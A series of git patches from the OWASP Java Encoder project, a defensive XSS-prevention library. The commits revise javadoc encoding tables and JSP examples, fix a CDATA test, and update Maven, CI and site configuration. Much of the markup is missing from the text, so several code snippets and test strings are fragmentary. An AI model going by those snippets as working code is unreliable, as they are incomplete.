-     *     out.println("<data>");
-     *     out.println("&;lt;!-- "+Encode.forXmlComment(comment)+" -->");
-     *     out.println("</data>");
+     *     out.println("<?xml version='1.0'?>");
+     *     out.println("<data>");
+     *     out.println("<!-- "+Encode.forXmlComment(comment)+" -->");
+     *     out.println("</data>");
      *
                    * * @param input the input to encode @@ -846,7 +846,7 @@ public final class Encode { * provide the CDATA section boundaries. * * 
                    -     *     <xml-data><![CDATA[<%=Encode.forCDATA(...)%>]]></xml-data>
+     *     <xml-data><![CDATA[<%=Encode.forCDATA(...)%>]]></xml-data>
      *
                    * * @param input the input to encode @@ -920,16 +920,16 @@ public final class Encode { * are writing a framework on top of this library, it is recommend * that you use this method over the others.

                    * - *
                    Example JSP Usage:
                    + * Example JSP Usage: * 
                    -     *    <button onclick="alert('<%=Encode.forJavaScript(data)%>');">
-     *    <script type="text/javascript">
-     *        var data = "<%=Encode.forJavaScript(data)%>";
-     *    </script>
+     *    <button onclick="alert('<%=Encode.forJavaScript(data)%>');">
+     *    <script type="text/javascript">
+     *        var data = "<%=Encode.forJavaScript(data)%>";
+     *    </script>
      *
                    * - *
                    Encoding Description
                    * + * * * * @@ -972,7 +972,7 @@ public final class Encode { * "\&quot;".) * * - * + * * * * @@ -988,7 +988,7 @@ public final class Encode { * * * * * @@ -1041,9 +1041,9 @@ public final class Encode { * recommend that you use {@link #forJavaScript(String)} over this * method.

                    * - *
                    Example JSP Usage:
                    + * Example JSP Usage: * 
                    -     *    <button onclick="alert('<%=Encode.forJavaScriptAttribute(data)%>');">
+     *    <button onclick="alert('<%=Encode.forJavaScriptAttribute(data)%>');">
      *
                    * * @param input the input string to encode @@ -1084,11 +1084,11 @@ public final class Encode { * recommend that you use {@link #forJavaScript(String)} over this * method.

                    * - *
                    Example JSP Usage:
                    + * Example JSP Usage: * 
                    -     *    <script type="text/javascript">
-     *        var data = "<%=Encode.forJavaScriptBlock(data)%>";
-     *    </script>
+     *    <script type="text/javascript">
+     *        var data = "<%=Encode.forJavaScriptBlock(data)%>";
+     *    </script>
      *
                    * * @param input the input string to encode @@ -1129,19 +1129,19 @@ public final class Encode { * recommend that you use {@link #forJavaScript(String)} over this * method.

                    * - *
                    Example JSP Usage:
                    + * Example JSP Usage: * This example is serving up JavaScript source directly: * 
                    -     *    <%@page contentType="text/javascript; charset=UTF-8"%>
-     *    var data = "<%=Encode.forJavaScriptSource(data)%>";
+     *    <%@page contentType="text/javascript; charset=UTF-8"%>
+     *    var data = "<%=Encode.forJavaScriptSource(data)%>";
      *
                    * * This example is serving up JSON data (users of this use-case * are encouraged to read up on "JSON Hijacking"): * 
                    -     *    <%@page contentType="application/json; charset=UTF-8"%>
-     *    <% myapp.jsonHijackingPreventionMeasure(); %>
-     *    {"data":"<%=Encode.forJavaScriptSource(data)%>"}
+     *    <%@page contentType="application/json; charset=UTF-8"%>
+     *    <% myapp.jsonHijackingPreventionMeasure(); %>
+     *    {"data":"<%=Encode.forJavaScriptSource(data)%>"}
      *
                    * * @param input the input string to encode diff --git a/core/src/main/java/org/owasp/encoder/Encoder.java b/core/src/main/java/org/owasp/encoder/Encoder.java index 7f4b887..3c5656e 100644 --- a/core/src/main/java/org/owasp/encoder/Encoder.java +++ b/core/src/main/java/org/owasp/encoder/Encoder.java @@ -110,7 +110,7 @@ public abstract class Encoder { * true}). This will happen when the encoder needs to see more * input before determining what to do--for example when encoding * for CDATA, if the input ends with {@code "foo]]"}, the encoder - * will need to see the next character to determine if it is a ">" + * will need to see the next character to determine if it is a ">" * or not.

                    * *

                    Example usage:

                    -- cgit v1.2.3 From 6a4192cb78cc95f11f84ed827cef286c73fba900 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Sat, 11 Feb 2017 08:31:08 -0500 Subject: added license badge --- README.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/README.md b/README.md index 54cb4e4..5817cee 100644 --- a/README.md +++ b/README.md @@ -1,5 +1,8 @@ OWASP Java Encoder Project ========================== + +[![License](https://img.shields.io/badge/License-BSD%203--Clause-blue.svg)](https://opensource.org/licenses/BSD-3-Clause) + Contextual Output Encoding is a computer programming technique necessary to stop Cross Site Scripting. This project is a Java 1.5+ simple-to-use drop-in high-performance encoder class with little baggage. For more information on how to use this project, please see https://www.owasp.org/index.php/OWASP_Java_Encoder_Project#tab=Use_the_Java_Encoder_Project. -- cgit v1.2.3 From bd9e935d4e03c3761e708b28ea9a3d2a01c43511 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Sat, 11 Feb 2017 08:43:58 -0500 Subject: fixed test case for PR #5 --- jsp/src/test/java/org/owasp/encoder/tag/ForCDATATagTest.java | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForCDATATagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForCDATATagTest.java index 1720d4e..e7f6f90 100644 --- a/jsp/src/test/java/org/owasp/encoder/tag/ForCDATATagTest.java +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForCDATATagTest.java @@ -67,7 +67,7 @@ public class ForCDATATagTest extends EncodingTagTest { System.out.println("doTag"); ForCDATATag instance = new ForCDATATag(); String value = "
                    ]]>
                    "; - String expected = "
                    ]]>]]
                    "; + String expected = "
                    ]]]]>
                    "; instance.setJspContext(_pageContext); instance.setValue(value); instance.doTag(); -- cgit v1.2.3 From a8b1f6a3e01fb9ac0bbd1de3b12a1ebd19e31d15 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Sat, 11 Feb 2017 08:44:12 -0500 Subject: upgraded plugins --- pom.xml | 26 +++++++++++++------------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/pom.xml b/pom.xml index bb9d7a3..a37e0d8 100755 --- a/pom.xml +++ b/pom.xml @@ -163,42 +163,42 @@ org.apache.maven.plugins maven-compiler-plugin - 3.2 + 3.5.1 org.apache.maven.plugins maven-jar-plugin - 2.5 + 3.0.2 org.apache.maven.plugins maven-source-plugin - 2.4 + 3.0.1 org.apache.maven.plugins maven-javadoc-plugin - 2.10.1 + 2.10.4 org.codehaus.mojo cobertura-maven-plugin - 2.5.2 + 2.7 org.apache.maven.plugins maven-failsafe-plugin - 2.18.1 + 2.19.1 org.apache.maven.plugins maven-surefire-plugin - 2.18.1 + 2.19.1 org.apache.maven.plugins maven-surefire-report-plugin - 2.18.1 + 2.19.1 org.apache.maven.plugins @@ -208,22 +208,22 @@ org.apache.maven.plugins maven-site-plugin - 3.4 + 3.5.1 org.apache.maven.plugins maven-project-info-reports-plugin - 2.8 + 2.9 org.apache.maven.plugins maven-pmd-plugin - 3.4 + 3.6 org.codehaus.mojo versions-maven-plugin - 2.1 + 2.3 org.apache.maven.plugins @@ -233,7 +233,7 @@ org.codehaus.mojo findbugs-maven-plugin - 3.0.0 + 3.0.4 -- cgit v1.2.3 From 8b77fc5336921b62478201bd8a7b3ad9f68ea9ca Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Sat, 11 Feb 2017 14:25:19 -0500 Subject: adding CI --- .travis.yml | 6 ++++++ 1 file changed, 6 insertions(+) create mode 100644 .travis.yml diff --git a/.travis.yml b/.travis.yml new file mode 100644 index 0000000..91d665a --- /dev/null +++ b/.travis.yml @@ -0,0 +1,6 @@ +language: java +jdk: + - oraclejdk8 + - oraclejdk7 + - openjdk6 +script: mvn test -B -- cgit v1.2.3 From ca5cfb63f25c56ad489aa9de5a70f8a6c094b8ad Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Sat, 11 Feb 2017 14:33:45 -0500 Subject: debugging CI --- .travis.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.travis.yml b/.travis.yml index 91d665a..ba456f5 100644 --- a/.travis.yml +++ b/.travis.yml @@ -3,4 +3,4 @@ jdk: - oraclejdk8 - oraclejdk7 - openjdk6 -script: mvn test -B +script: mvn test -B -X -- cgit v1.2.3 From 123bace3eb9a71ecf60c0b08fd872b6b7ff6d72a Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Sat, 11 Feb 2017 14:39:50 -0500 Subject: debugging CI --- pom.xml | 1 + 1 file changed, 1 insertion(+) diff --git a/pom.xml b/pom.xml index a37e0d8..d511912 100755 --- a/pom.xml +++ b/pom.xml @@ -276,6 +276,7 @@ org/owasp/encoder/BenchmarkTest.java + -Xmx1024m -XX:MaxPermSize=256m -- cgit v1.2.3 From 50d21d2b9e966444912ab606bc2953e13008e945 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Sat, 11 Feb 2017 14:43:27 -0500 Subject: added build status --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 5817cee..55fc80e 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,7 @@ OWASP Java Encoder Project ========================== -[![License](https://img.shields.io/badge/License-BSD%203--Clause-blue.svg)](https://opensource.org/licenses/BSD-3-Clause) +[![Build Status](https://travis-ci.org/OWASP/owasp-java-encoder.svg?branch=master)](https://travis-ci.org/OWASP/owasp-java-encoder) [![License](https://img.shields.io/badge/License-BSD%203--Clause-blue.svg)](https://opensource.org/licenses/BSD-3-Clause) Contextual Output Encoding is a computer programming technique necessary to stop Cross Site Scripting. This project is a Java 1.5+ simple-to-use drop-in high-performance encoder class with little baggage. -- cgit v1.2.3 From 8b23ab69c7b27523c9df29d52dc286581851eedd Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Sat, 11 Feb 2017 16:20:53 -0500 Subject: updated site --- core/src/site/site.xml | 7 ++++++- esapi/src/site/site.xml | 7 ++++++- jsp/src/site/site.xml | 7 ++++++- pom.xml | 7 ++++++- src/site/resources/images/owasp.jpg | Bin 0 -> 11488 bytes src/site/site.xml | 25 ++++++++++--------------- 6 files changed, 34 insertions(+), 19 deletions(-) create mode 100644 src/site/resources/images/owasp.jpg diff --git a/core/src/site/site.xml b/core/src/site/site.xml index b465001..df4ef60 100644 --- a/core/src/site/site.xml +++ b/core/src/site/site.xml @@ -37,7 +37,12 @@ OF THE POSSIBILITY OF SUCH DAMAGE. --> - Encoder + OWASP Java Encoder Project: CORE + OWASP Java Encoder Project: CORE + OWASP Java Encoder Project: CORE + ../images/owasp.jpg + 107 + 300 diff --git a/esapi/src/site/site.xml b/esapi/src/site/site.xml index 877ac16..65ffdba 100644 --- a/esapi/src/site/site.xml +++ b/esapi/src/site/site.xml @@ -37,7 +37,12 @@ OF THE POSSIBILITY OF SUCH DAMAGE. --> - ESAPI + OWASP Java Encoder Project: ESAPI + OWASP Java Encoder Project: ESAPI + OWASP Java Encoder Project: ESAPI + ../images/owasp.jpg + 107 + 300 diff --git a/jsp/src/site/site.xml b/jsp/src/site/site.xml index 4b3621d..a16f931 100644 --- a/jsp/src/site/site.xml +++ b/jsp/src/site/site.xml @@ -37,7 +37,12 @@ OF THE POSSIBILITY OF SUCH DAMAGE. --> - JSP + OWASP Java Encoder Project: JSP + OWASP Java Encoder Project: JSP + OWASP Java Encoder Project: JSP + ../images/owasp.jpg + 107 + 300 diff --git a/pom.xml b/pom.xml index d511912..3985299 100755 --- a/pom.xml +++ b/pom.xml @@ -309,10 +309,15 @@ org.apache.maven.plugins maven-site-plugin + + org.apache.maven.doxia + doxia-core + 1.7 + org.apache.maven.doxia doxia-module-markdown - 1.6 + 1.7 diff --git a/src/site/resources/images/owasp.jpg b/src/site/resources/images/owasp.jpg new file mode 100644 index 0000000..addae89 Binary files /dev/null and b/src/site/resources/images/owasp.jpg differ diff --git a/src/site/site.xml b/src/site/site.xml index a389c70..2df1953 100644 --- a/src/site/site.xml +++ b/src/site/site.xml @@ -39,7 +39,7 @@ OF THE POSSIBILITY OF SUCH DAMAGE. org.apache.maven.skins maven-fluido-skin - 1.3.1 + 1.6 @@ -55,9 +55,12 @@ OF THE POSSIBILITY OF SUCH DAMAGE. OWASP Java Encoder Project + OWASP Java Encoder Project OWASP Java Encoder Project - - + ./images/owasp.jpg + 107 + 300 + @@ -65,19 +68,11 @@ OF THE POSSIBILITY OF SUCH DAMAGE. - + img="/images/logos/build-by-maven-white.png"/> - - - - + @@ -87,6 +82,6 @@ OF THE POSSIBILITY OF SUCH DAMAGE. -
                    Copyright © 2011-2015 OWASP. All Rights Reserved.
                    +
                    Copyright © 2011-2017 OWASP. All Rights Reserved.
                     -- cgit v1.2.3 From 90be286ea76a6fa9c94636590a70ba56f4d6649b Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Mon, 13 Feb 2017 09:16:54 -0500 Subject: updated maven site to use reflow --- core/pom.xml | 2 +- core/src/main/java/org/owasp/encoder/Encode.java | 302 +++++++++++------------ core/src/site/markdown/index.md | 35 +++ core/src/site/site.xml | 16 -- esapi/pom.xml | 2 +- esapi/src/site/site.xml | 18 +- jsp/pom.xml | 2 +- jsp/src/site/markdown/index.md | 31 +++ jsp/src/site/site.xml | 16 -- pom.xml | 40 +-- src/site/markdown/index.md | 56 +++++ src/site/site.xml | 77 +++--- 12 files changed, 336 insertions(+), 261 deletions(-) create mode 100644 core/src/site/markdown/index.md create mode 100644 jsp/src/site/markdown/index.md create mode 100644 src/site/markdown/index.md diff --git a/core/pom.xml b/core/pom.xml index 7fafdac..edd9bb5 100644 --- a/core/pom.xml +++ b/core/pom.xml @@ -49,7 +49,7 @@ encoder jar - OWASP Encoders + Java Encoder The OWASP Encoders package is a collection of high-performance low-overhead contextual encoders, that when utilized correctly, is an effective tool in diff --git a/core/src/main/java/org/owasp/encoder/Encode.java b/core/src/main/java/org/owasp/encoder/Encode.java index 3e3dc59..1d3d406 100644 --- a/core/src/main/java/org/owasp/encoder/Encode.java +++ b/core/src/main/java/org/owasp/encoder/Encode.java @@ -78,41 +78,40 @@ public final class Encode { * <input value="<%=Encode.forHtml(unsafeData)%>" /> * * - *
                    Encoding Description
                    Input Character
                    U+0026&U+0026&\x26Ampersand character
                    U+002F/\/This encoding is used to avoid an input sequence - * "</" from prematurely terminating a </script> + * "</" from prematurely terminating a </script> * block.
                    + *
                    * * - * - * - * + * + * + * * * * - * - * - * + * + * + * * - * - * - * + * + * + * * - * - * - * + * + * + * * - * - * - * + * + * + * * - * - * - * + * + * + * * * *
                    Encoding Table
                    InputResult
                    InputResult
                    “{@code &}”“{@code &}”
                    {@code &}{@code &}
                    “{@code <}”“{@code <}”
                    {@code <}{@code <}
                    “{@code >}”“{@code >}”
                    {@code >}{@code >}
                    “{@code "}”“{@code "}”
                    {@code "}{@code "}
                    “{@code '}”“{@code '}”
                    {@code '}{@code '}
                    * - * Additional Notes + *

                    Additional Notes

                    *
                      - * *
                    • The encoding of the greater-than sign ({@code >}) is not * strictly required, but is included for maximum * compatibility.
                      • @@ -132,7 +131,6 @@ public final class Encode { * as they could lead to parsing errors. In particular only {@code #x9 * | #xA | #xD | [#x20-#xD7FF] | [#xE000-#xFFFD] | * [#x10000-#x10FFFF]} are considered valid. - * *
                    * * @param input the data to encode @@ -164,33 +162,32 @@ public final class Encode { * 
                          *     <div><%=Encode.forHtmlContent(unsafeData)%></div>
      *
                    - * + *
                    * * - * - * - * + * + * + * * * * - * - * - * + * + * + * * - * - * - * + * + * + * * - * - * - * + * + * + * * * *
                    Encoding Table
                    InputResult
                    InputResult
                    “{@code &}”“{@code &}”
                    {@code &}{@code &}
                    “{@code <}”“{@code <}”
                    {@code <}{@code <}
                    “{@code >}”“{@code >}”
                    {@code >}{@code >}
                    * - * Additional Notes + *

                    Additional Notes

                    *
                      - * *
                    • Single-quote character ({@code '}) and double-quote * character ({@code "}) do not require encoding in HTML * blocks, unlike other HTML contexts.
                      • @@ -211,7 +208,6 @@ public final class Encode { * as they could lead to parsing errors. In particular only {@code #x9 * | #xA | #xD | [#x20-#xD7FF] | [#xE000-#xFFFD] | * [#x10000-#x10FFFF]} are considered valid. - * *
                    * * @param input the input to encode @@ -243,37 +239,36 @@ public final class Encode { * <div><%=Encode.forHtml(unsafeData)%></div> * * - * + *
                    * * - * - * - * + * + * + * * * * - * - * - * + * + * + * * - * - * - * + * + * + * * - * - * - * + * + * + * * - * - * - * + * + * + * * * *
                    Encoding Table
                    InputResult
                    InputResult
                    “{@code &}”“{@code &}”
                    {@code &}{@code &}
                    “{@code <}”“{@code <}”
                    {@code <}{@code <}
                    “{@code "}”“{@code "}”
                    {@code "}{@code "}
                    “{@code '}”“{@code '}”
                    {@code '}{@code '}
                    * - * Additional Notes + *

                    Additional Notes

                    *
                      - * *
                    • Both the single-quote character ({@code '}) and the * double-quote character ({@code "}) are encoded so this is safe * for HTML attributes with either enclosing character.
                      • @@ -296,7 +291,6 @@ public final class Encode { * as they could lead to parsing errors. In particular only {@code #x9 * | #xA | #xD | [#x20-#xD7FF] | [#xE000-#xFFFD] | * [#x10000-#x10FFFF]} are considered valid. - * *
                    * * @param input the input to encode @@ -344,46 +338,45 @@ public final class Encode { * <input value=<%=Encode.forHtmlUnquotedAttribute(input)%> > * * - * + *
                    * * - * - * - * + * + * + * * * * - * - * - * - * - * - * - * - * - * - * - * - * - * - * - * - * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * * *
                    Encoding Table
                    InputResult
                    InputResult
                    {@code U+0009} (horizontal tab)“{@code }”
                    {@code U+000A} (line feed)“{@code }”
                    {@code U+000C} (form feed)“{@code }”
                    {@code U+000D} (carriage return)“{@code }”
                    {@code U+0020} (space)“{@code }”
                    “{@code &}”“{@code &}”
                    “{@code <}”“{@code <}”
                    “{@code >}”“{@code >}”
                    “{@code "}”“{@code "}”
                    “{@code '}”“{@code '}”
                    “{@code /}”“{@code /}”
                    “{@code =}”“{@code =}”
                    “{@code `}”“{@code `}”
                    {@code U+0085} (next line)“{@code …}”
                    {@code U+2028} (line separator)“{@code 
}”
                    {@code U+2029} (paragraph separator)“{@code 
}”
                    {@code U+0009} (horizontal tab){@code }
                    {@code U+000A} (line feed){@code }
                    {@code U+000C} (form feed){@code }
                    {@code U+000D} (carriage return){@code }
                    {@code U+0020} (space){@code }
                    {@code &}{@code &}
                    {@code <}{@code <}
                    {@code >}{@code >}
                    {@code "}{@code "}
                    {@code '}{@code '}
                    {@code /}{@code /}
                    {@code =}{@code =}
                    {@code `}{@code `}
                    {@code U+0085} (next line){@code …}
                    {@code U+2028} (line separator){@code 
}
                    {@code U+2029} (paragraph separator){@code 
}
                    * - * Additional Notes + *

                    Additional Notes

                    *
                      - * *
                    • The following characters are not encoded: - * {@code 0-9, a-z, A-Z}, “{@code !}”, “{@code - * #}”, “{@code $}”, “{@code %}”, - * “{@code (}”, “{@code )}”, “{@code - * *}”, “{@code +}”, “{@code ,}”, - * “{@code -}”, “{@code .}”, “{@code - * [}”, “{@code \}”, “{@code ]}”, - * “{@code ^}”, “{@code _}”, “{@code - * }}”.
                      • + * {@code 0-9, a-z, A-Z}, {@code !}, {@code + * #}, {@code $}, {@code %}, + * {@code (}, {@code )}, {@code + * *}, {@code +}, {@code ,}, + * {@code -}, {@code .}, {@code + * [}, {@code \}, {@code ]}, + * {@code ^}, {@code _}, {@code + * }}. * *
                    • Surrogate pairs are passed through only if valid. Invalid * surrogate pairs are replaced by a hyphen (-).
                      • @@ -393,7 +386,6 @@ public final class Encode { * hyphen (-) character. * *
                    • Unicode "non-characters" are replaced by hyphens (-).
                      • - * *
                    * * @param input the attribute value to be encoded. @@ -450,15 +442,15 @@ public final class Encode { * *
                  • The following characters are encoded using hexidecimal * encodings: {@code U+0000} - {@code U+001f}, - * “{@code "}”, - * “{@code '}”, - * “{@code \}”, - * “{@code <}”, - * “{@code &}”, - * “{@code (}”, - * “{@code )}”, - * “{@code /}”, - * “{@code >}”, + * {@code "}, + * {@code '}, + * {@code \}, + * {@code <}, + * {@code &}, + * {@code (}, + * {@code )}, + * {@code /}, + * {@code >}, * {@code U+007f}, * line separator ({@code U+2028}), * paragraph separator ({@code U+2029}).
                    • @@ -528,13 +520,13 @@ public final class Encode { * *
                  • The following characters are encoded using hexidecimal * encodings: {@code U+0000} - {@code U+001f}, - * “{@code "}”, - * “{@code '}”, - * “{@code \}”, - * “{@code <}”, - * “{@code &}”, - * “{@code /}”, - * “{@code >}”, + * {@code "}, + * {@code '}, + * {@code \}, + * {@code <}, + * {@code &}, + * {@code /}, + * {@code >}, * {@code U+007f}, * line separator ({@code U+2028}), * paragraph separator ({@code U+2029}).
                    • @@ -584,13 +576,13 @@ public final class Encode { } /** - * Performs percent-encoding of a URL according to RFC 3986. The provided + *

                    Performs percent-encoding of a URL according to RFC 3986. The provided * URL is assumed to a valid URL. This method does not do any checking on * the quality or safety of the URL itself. In many applications it may * be better to use {@link java.net.URI} instead. Note: this is a * particularly dangerous context to put untrusted content in, as for * example a "javascript:" URL provided by a malicious user would be - * "properly" escaped, and still execute. + * "properly" escaped, and still execute.

                    * * Encoding Table *

                    The following characters are not encoded:

                    @@ -928,78 +920,78 @@ public final class Encode { * </script> * * - * + *
                    * * - * - * - * - * + * + * + * + * * * * - * - * - * - * + * + * + * + * * - * - * - * - * + * + * + * + * * - * - * - * - * + * + * + * + * * - * - * - * - * + * + * + * + * * - * - * - * - * + * + * + * + * * - * - * - * - * + * + * + * * - * - * - * - * + * + * + * + * * - * - * - * - * + * + * + * * - * - * - * - * + * + * + * * - * - * - * - * + * + * + * + * * - * - * - * - * + * + * + * * * diff --git a/core/src/site/markdown/index.md b/core/src/site/markdown/index.md new file mode 100644 index 0000000..e3f8f99 --- /dev/null +++ b/core/src/site/markdown/index.md @@ -0,0 +1,35 @@ +## OWASP Java Encoder + +The OWASP Java Encoder is a collection of high-performance low-overhead +contextual encoders that, when utilized correctly, is an effective tool in +preventing Web Application security vulnerabilities such as Cross-Site +Scripting (XSS). + +Please see the [OWASP XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet) +for more information on preventing XSS. + +For use within JSP pages consider using the [JSP Encoder](../encoder-jsp/index.html) as it +provides a TLD to make the use of the core encoders easier. + +### Usage + +The JARs can be found in [Maven Central](https://search.maven.org/#search%7Cga%7C1%7Cg%3A%22org.owasp.encoder%22). + +```xml + + org.owasp.encoder + encoder + 1.2.1 + +``` + +Utilize the encoder: + +```java +import org.owasp.encoder.Encode; + +//... + +PrintWriter out = ....; +out.println(""); +``` diff --git a/core/src/site/site.xml b/core/src/site/site.xml index df4ef60..1b3cb62 100644 --- a/core/src/site/site.xml +++ b/core/src/site/site.xml @@ -36,22 +36,6 @@ OF THE POSSIBILITY OF SUCH DAMAGE. --> - - OWASP Java Encoder Project: CORE - OWASP Java Encoder Project: CORE - OWASP Java Encoder Project: CORE - ../images/owasp.jpg - 107 - 300 - - - - - - \ No newline at end of file diff --git a/esapi/pom.xml b/esapi/pom.xml index def23df..c3f9c7c 100644 --- a/esapi/pom.xml +++ b/esapi/pom.xml @@ -49,7 +49,7 @@ encoder-esapi jar - OWASP Encoders ESAPI Thunk + ESAPI Thunk The OWASP Encoders ESAPI Thunk provides an easy way to plugin the Encoder Projects API into an implementation of ESAPI. diff --git a/esapi/src/site/site.xml b/esapi/src/site/site.xml index 65ffdba..743ef44 100644 --- a/esapi/src/site/site.xml +++ b/esapi/src/site/site.xml @@ -36,22 +36,6 @@ OF THE POSSIBILITY OF SUCH DAMAGE. --> - - OWASP Java Encoder Project: ESAPI - OWASP Java Encoder Project: ESAPI - OWASP Java Encoder Project: ESAPI - ../images/owasp.jpg - 107 - 300 - - - - - - - + \ No newline at end of file diff --git a/jsp/pom.xml b/jsp/pom.xml index 1609f91..74a6efa 100644 --- a/jsp/pom.xml +++ b/jsp/pom.xml @@ -49,7 +49,7 @@ encoder-jsp jar - OWASP Encoders JSP tags and EL functions + JSP Encoder The OWASP Encoder JSP package contains JSP tag definitions and TLDs to allow easy use of the OWASP Encoder Project's core API. The TLDs contain both tag diff --git a/jsp/src/site/markdown/index.md b/jsp/src/site/markdown/index.md new file mode 100644 index 0000000..cc3b6f2 --- /dev/null +++ b/jsp/src/site/markdown/index.md @@ -0,0 +1,31 @@ +## OWASP JSP + +The OWASP JSP Encoder is a collection of high-performance low-overhead +contextual encoders that, when utilized correctly, is an effective tool in +preventing Web Application security vulnerabilities such as Cross-Site +Scripting (XSS). + +Please see the [OWASP XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet) +for more information on preventing XSS. + +### JSP Usage + +The JSP Encoder makes the use of the Java Encoder within JSP simple via a TLD that +includes tags and a set of JSP EL functions: + +```xml + + org.owasp.encoder + encoder-jsp + 1.2.1 + +``` + +```JSP +<%@taglib prefix="e" uri="https://www.owasp.org/index.php/OWASP_Java_Encoder_Project" %> + +<%-- ... --%> + +

                    Dynamic data via EL: ${e:forHtml(param.value)}

                    +

                    Dynamic data via tag:

                    +``` diff --git a/jsp/src/site/site.xml b/jsp/src/site/site.xml index a16f931..dde2b60 100644 --- a/jsp/src/site/site.xml +++ b/jsp/src/site/site.xml @@ -36,22 +36,6 @@ OF THE POSSIBILITY OF SUCH DAMAGE. --> - - OWASP Java Encoder Project: JSP - OWASP Java Encoder Project: JSP - OWASP Java Encoder Project: JSP - ../images/owasp.jpg - 107 - 300 - - - - - - \ No newline at end of file diff --git a/pom.xml b/pom.xml index 3985299..1cb08dd 100755 --- a/pom.xml +++ b/pom.xml @@ -45,7 +45,7 @@ 1.2.1-SNAPSHOT pom - OWASP Encoders Parent + OWASP Java Encoder Project The OWASP Encoders package is a collection of high-performance low-overhead contextual encoders, that when utilized correctly, is an effective tool in @@ -183,7 +183,7 @@ org.codehaus.mojo cobertura-maven-plugin - 2.7 + 2.6 org.apache.maven.plugins @@ -208,7 +208,26 @@ org.apache.maven.plugins maven-site-plugin - 3.5.1 + + 3.4 + + + lt.velykis.maven.skins + reflow-velocity-tools + 1.1.1 + + + + org.apache.velocity + velocity + 1.7 + + + org.apache.maven.doxia + doxia-module-markdown + 1.6 + + org.apache.maven.plugins @@ -308,21 +327,6 @@ org.apache.maven.plugins maven-site-plugin - - - org.apache.maven.doxia - doxia-core - 1.7 - - - org.apache.maven.doxia - doxia-module-markdown - 1.7 - - - - true - diff --git a/src/site/markdown/index.md b/src/site/markdown/index.md new file mode 100644 index 0000000..1be294d --- /dev/null +++ b/src/site/markdown/index.md @@ -0,0 +1,56 @@ +## OWASP Java Encoder Project + +The OWASP Java Encoder Project is a collection of high-performance low-overhead +contextual encoders, that when utilized correctly, is an effective tool in +preventing Web Application security vulnerabilities such as Cross-Site +Scripting (XSS). + +Please see the [OWASP XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet) +for more information on preventing XSS. + +### Usage + +In addition to the usage guidance below, more examples can be found on the [OWASP Java Encoder Project Wiki](https://www.owasp.org/index.php/OWASP_Java_Encoder_Project#tab=Use_the_Java_Encoder_Project). + +The JARs can be found in [Maven Central](https://search.maven.org/#search%7Cga%7C1%7Cg%3A%22org.owasp.encoder%22). + +```xml + + org.owasp.encoder + encoder + 1.2.1 + +``` + +Utilize the encoder: + +```java +import org.owasp.encoder.Encode; + +//... + +PrintWriter out = ....; +out.println(""); +``` + +### JSP Usage + +The JSP Encoder makes the use of the Java Encoder within JSP simple via a TLD that +includes tags and a set of JSP EL functions: + +```xml + + org.owasp.encoder + encoder-jsp + 1.2.1 + +``` + +```JSP +<%@taglib prefix="e" uri="https://www.owasp.org/index.php/OWASP_Java_Encoder_Project" %> + +<%-- ... --%> + +

                    Dynamic data via EL: ${e:forHtml(param.value)}

                    +

                    Dynamic data via tag:

                    +``` diff --git a/src/site/site.xml b/src/site/site.xml index 2df1953..f1d4a83 100644 --- a/src/site/site.xml +++ b/src/site/site.xml @@ -37,51 +37,56 @@ OF THE POSSIBILITY OF SUCH DAMAGE. --> - org.apache.maven.skins - maven-fluido-skin - 1.6 + lt.velykis.maven.skins + reflow-maven-skin + 1.1.1 - - - true - true - - owasp/owasp-java-encoder - right - gray - - - - - + + + OWASP Java Encoder Project OWASP Java Encoder Project OWASP Java Encoder Project ./images/owasp.jpg 107 300 - + + + + default + true + github + + ${project.name} + https://www.owasp.org/index.php/OWASP_Java_Encoder_Project + + false + top + 6 + Modules|Maven Documentation + + Modules + Contribute + Maven Documentation + + + + + + - - - - - - - - - - - - - - - + + + + + + + + + + +
                    Copyright © 2011-2017 OWASP. All Rights Reserved.
                    -- cgit v1.2.3 From 789a380d44d1e89826c15e4654650cdab9a05dee Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Tue, 14 Feb 2017 08:36:29 -0500 Subject: formating and checkstyle corrections --- .gitignore | 3 +- .../main/java/org/owasp/encoder/CDATAEncoder.java | 166 +++---- .../main/java/org/owasp/encoder/CSSEncoder.java | 16 +- .../java/org/owasp/encoder/ChainedEncoder.java | 2 +- core/src/main/java/org/owasp/encoder/Encode.java | 69 ++- .../main/java/org/owasp/encoder/HTMLEncoder.java | 552 +++++++++++++-------- .../main/java/org/owasp/encoder/JavaEncoder.java | 213 ++++---- .../java/org/owasp/encoder/JavaScriptEncoder.java | 183 ++++--- .../main/java/org/owasp/encoder/URIEncoder.java | 6 +- .../java/org/owasp/encoder/XMLCommentEncoder.java | 15 +- .../main/java/org/owasp/encoder/XMLEncoder.java | 66 ++- pom.xml | 36 +- src/main/config/checkstyle.xml | 4 +- 13 files changed, 765 insertions(+), 566 deletions(-) diff --git a/.gitignore b/.gitignore index ae98f63..3a37f93 100644 --- a/.gitignore +++ b/.gitignore @@ -12,4 +12,5 @@ maven-eclipse.xml .externalToolBuilders # Netbeans configuration nb-configuration.xml -/target/ \ No newline at end of file +/target/ +/core/nbproject/ \ No newline at end of file diff --git a/core/src/main/java/org/owasp/encoder/CDATAEncoder.java 